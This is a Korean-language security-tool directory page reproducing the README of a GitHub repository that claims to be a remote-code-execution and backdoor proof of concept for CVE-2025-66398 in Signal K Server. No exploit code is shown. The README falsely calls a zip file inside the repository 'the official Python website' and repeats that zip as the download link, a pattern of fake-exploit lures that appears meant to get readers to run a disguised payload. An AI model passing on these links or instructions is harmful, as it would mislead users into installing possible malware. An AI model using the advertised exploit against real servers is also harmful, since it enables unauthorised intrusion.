Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-66398 — Signal K Server CVE-2025-66398의 악용을 시연하여 인증되지 않은 공격자가 백도어를 주입하고 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/showy-headteacher114/cve-2025-66398
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Signal K Server CVE-2025-66398의 악용을 시연하여 인증되지 않은 공격자가 백도어를 주입하고 원격 코드 실행을 가능하게 합니다.

저장소 보기
133일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ cve-2025-66398 - 간단한 RCE 개념 증명 도구

Download


⚙️ 이 도구 정보

이 프로젝트는 Signal K Server 버전 2.18.0 이하에서 발생하는 원격 코드 실행(RCE) 취약점을 시연합니다. 개념 증명(PoC)은 공격자가 취약한 기기에서 명령을 실행할 수 있는 방법을 보여줍니다.

이 도구는 보안 테스터, 시스템 관리자 또는 이 보안 문제를 이해하는 데 관심이 있는 모든 사람을 위해 설계되었습니다. 실행하는 데 사전 프로그래밍 기술이 필요하지 않지만, 기본적인 컴퓨터 탐색 지식이 있으면 도움이 됩니다.


🖥️ 시스템 요구 사항

  • Windows 10 이상
  • 최소 2GB의 여유 RAM
  • 100MB의 여유 디스크 공간
  • 파일 다운로드를 위한 인터넷 연결
  • 관리자 권한은 필요하지 않음

📥 다운로드 및 설치 방법

아래 버튼을 클릭하여 프로젝트 페이지를 방문하고 파일을 다운로드하세요.

Download

1단계: 다운로드 페이지 방문

위의 링크로 이동하세요. GitHub 페이지에 파일 및 폴더 목록이 표시됩니다.

2단계: ZIP 파일 다운로드

페이지 오른쪽 상단 근처에 있는 초록색 Code 버튼을 찾으세요. 클릭한 다음 Download ZIP을 선택하세요.

3단계: 파일 압축 풀기

  • 다운로드 폴더에서 다운로드한 ZIP 파일을 찾으세요.
  • ZIP 파일을 마우스 오른쪽 버튼으로 클릭하고 Extract All을 선택하세요.
  • 파일을 저장할 폴더를 선택한 다음 Extract를 클릭하세요.

4단계: 애플리케이션 찾기

압축을 푼 폴더를 엽니다. 스크립트 및 문서와 같은 프로젝트 관련 파일이 표시되어야 합니다.


▶️ Windows에서 도구 실행 방법

이 프로젝트는 Python과 Go로 작성된 스크립트를 사용합니다. 도구를 실행하려면 간단한 명령 프롬프트 창을 사용합니다.

1단계: 명령 프롬프트 열기

  • 키보드에서 Win + R을 누르세요.
  • cmd를 입력하고 Enter를 누르세요.

2단계: 폴더로 이동

path\to\folder를 압축을 푼 폴더 경로로 바꿔서 다음 명령을 입력하세요:

root@kitploit:~
cd path\to\folder

Enter를 누르세요.

3단계: 스크립트 실행

run.bat 또는 start.bat과 같은 이름의 스크립트가 있을 수 있습니다. 있다면 해당 이름을 입력하고 Enter를 누르세요. 예:

root@kitploit:~
run.bat

BAT 파일이 없다면 .py로 끝나는 Python 스크립트를 찾으세요. PC에 Python이 설치되어 있어야 합니다(다음 섹션 참조).

다음 명령을 입력하여 실행하세요:

root@kitploit:~
python scriptname.py

scriptname.py를 실제 파일 이름으로 바꾸세요.


🐍 Python 설치(필요한 경우)

Python이 인식되지 않는다는 오류가 발생하면 Python을 설치해야 합니다.

1단계: Python 다운로드

공식 Python 웹사이트로 이동하세요:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

최신 Windows 설치 프로그램을 클릭하여 다운로드하세요.

2단계: Python 설치

  • 다운로드한 설치 프로그램을 실행하세요.
  • Install Now를 클릭하기 전에 Add Python to PATH 상자를 체크하세요.
  • 설치가 완료될 때까지 기다리세요.

3단계: Python 설치 확인

새 명령 프롬프트 창을 열고 다음을 입력하세요:

root@kitploit:~
python --version

설치된 Python 버전이 표시되어야 합니다.


🚨 도구를 안전하게 실행하기

이 도구는 특정 취약점에 대한 테스트 및 학습 목적으로만 사용됩니다. 테스트 네트워크 또는 격리된 머신과 같은 안전한 환경에서 사용하세요.

소유하지 않았거나 테스트 권한이 없는 시스템에 대해 실행하지 마세요.


🔍 도구 작동 방식

이 도구는 Signal K Server 버전 2.18.0 이하를 실행하는 기기를 스캔합니다. 취약점을 악용하는 명령을 전송하고 대상이 해당 명령을 실행하는지 확인합니다.

이를 통해 보안 전문가는 자신의 시스템이 취약한지 확인하고 업데이트 또는 보안 강화 조치를 취할 수 있습니다.


💡 문제 해결

  • 도구가 시작되지 않으면 명령 프롬프트에서 올바른 폴더에 있는지 확인하세요.
  • Python이 설치되어 있고 시스템 PATH에 추가되었는지 확인하세요.
  • 네트워크 액세스를 차단할 수 있는 다른 응용 프로그램을 종료하세요.
  • 권한 오류가 발생하면 명령 프롬프트를 관리자로 실행하세요.
  • 대상 기기가 네트워크에서 연결 가능한지 확인하세요.

📄 추가 리소스

CVE-2025-66398 취약점에 대한 자세한 내용은 보안 데이터베이스 또는 GitHub에서 관련 연구를 검색하세요.


🔗 다운로드 링크

이 페이지를 방문하여 도구 파일을 다운로드하세요:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

도구 다운로드